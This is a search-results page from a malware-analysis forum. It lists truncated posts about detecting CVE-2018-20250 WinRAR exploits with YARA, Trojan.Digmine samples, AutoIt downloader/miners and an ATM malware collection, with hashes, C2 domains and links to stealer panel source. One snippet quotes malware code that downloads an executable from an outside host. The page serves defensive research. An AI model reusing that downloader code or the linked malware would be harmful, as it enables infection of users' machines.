A forum for reverse engineering, OS internals and malware analysis 

Search found 1622 matches


Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Wed May 01, 2019 7:36 pm ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 7 ¦  Views: 1175

April: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-04-01: 6dffbbe53b14d9e9ef3b758a93244d268edb370f26b11434af0930e7ea0a98b1 test.rar 57511133930b64392eb093612c0fb707b37a7c8f9ea7f629ce138fa6eeb71911 file.rar a9e94c9d13c3aa6fb9ed9deddbf2007b43c07b68e951b4c38c10dad63bdac447 evil.r...

Re: Trojan.Digmine

 by Xylitol ¦  Tue Apr 30, 2019 3:43 am ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2104

thx, I edited the thread title according to the Trendmicro detection. Also, here is another curiosity: dene.exe - 574ee5f6f38fe5b63eeb0d9bd8a7934027abf2a7b7000f79fba70e4526d94f17 - 951.0 KB Func download() Local $hdownload = InetGet("http://letask.me/test.php", "sa.exe", $inet_forcereload, $inet_downlo...

Re: AutoIt downloader/miner

 by Xylitol ¦  Sun Apr 28, 2019 7:41 pm ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2104

Another. 8b68940459c9d22ee049e77c8ed5db77ef799ab3dedd0e7b6f75e93c49e8eed1 - 992.0 KB AnyRun has a good one about it: https://any.run/report/365167731ed69d11c2db17310e5015fc07b9d44325bf797779cff36563d9f84c/2f301ccf-e54f-4a63-8cf7-b9b43cee2799 Calling: - susu.icu - luru.icu Same design of url shorten...

Trojan.Digmine

 by Xylitol ¦  Sun Apr 28, 2019 2:23 pm ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2104

Saw it yesterday spreading on Facebook groups with random names and packed into .bz archives. https://i.imgur.com/UsBaWK1.png I got 2 samples from that (they are in the attachment): 8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478 - 985.0 KB 8cb158ed001eded4d7a82847cb669b68da2fac74357aa97...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Mon Apr 01, 2019 1:27 am ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 7 ¦  Views: 1175

March: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-03-31: ceeb05b114d99453df04bba0138c597f4a87b446a55baf20d9d5a3f121dc7090 SMASH_Fornite_Logs.rar 027ccb2e3874e05fbaf750b2253c4044100021741abc77f720804de4040fe3a3 sdhong_exe.rar acc5c5092e3f7f7967f1827434e4c738e867e476c9e4ea8afc1...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Tue Mar 19, 2019 4:36 am ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 7 ¦  Views: 1175

So far the rule works well. It has also been pulled here: https://github.com/Yara-Rules/rules/blob/master/CVE_Rules/CVE-2018-20250.yar ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP FILE >>>>> C:/SBOX/temp/ace/0312885f07b5a028e64c6a2a440a8584c67adf2c0986e99447328c4bede4e102 - wincon.exe -...

Global ATM Malware Wall

 by Xylitol ¦  Mon Mar 18, 2019 4:08 am ¦  Forum: General Discussion ¦  Topic: Global ATM Malware Wall ¦  Replies: 1 ¦  Views: 438

https://i.imgur.com/4RvpKuy.png Hi there, With a few guys we made a zoo dedicated to malware targeting ATM platforms; as far as I know nobody has made a similar public project, so voilà. You will find here malware that specifically targets ATMs, and reports (notices) about them. Files of interest got ...

https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside gate v1: https://github.com/futex/Malwares-code/blob/master/Panels/AZORult/V1/gate.php gate v2: https://github.com/futex/Malwares-code/blob/master/Panels/AZORult/V2/gate.php gate...

Re: CVE-2018-20250 Exploits (WinRAR)

 by Xylitol ¦  Fri Mar 15, 2019 2:23 pm ¦  Forum: Completed Malware Requests ¦  Topic: CVE-2018-20250 Exploits (WinRAR) ¦  Replies: 1 ¦  Views: 485

Attached everything except 65e6831bf0f3af34e19f25dfaef49823 (16.58 MB) and d7d30c2f26084c6cfe06bc21d7e813b1, which can be found here: viewtopic.php?f=16&t=5479

CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Fri Mar 15, 2019 2:05 pm ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 7 ¦  Views: 1175

Extracting a 19 Year Old Code Execution from WinRAR - https://research.checkpoint.com/extracting-code-execution-from-winrar/ Attackers Exploiting WinRAR UNACEV2.DLL Vulnerability (CVE-2018-20250) - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/attackers-exploiting-winrar-unacev2-dll-vu...
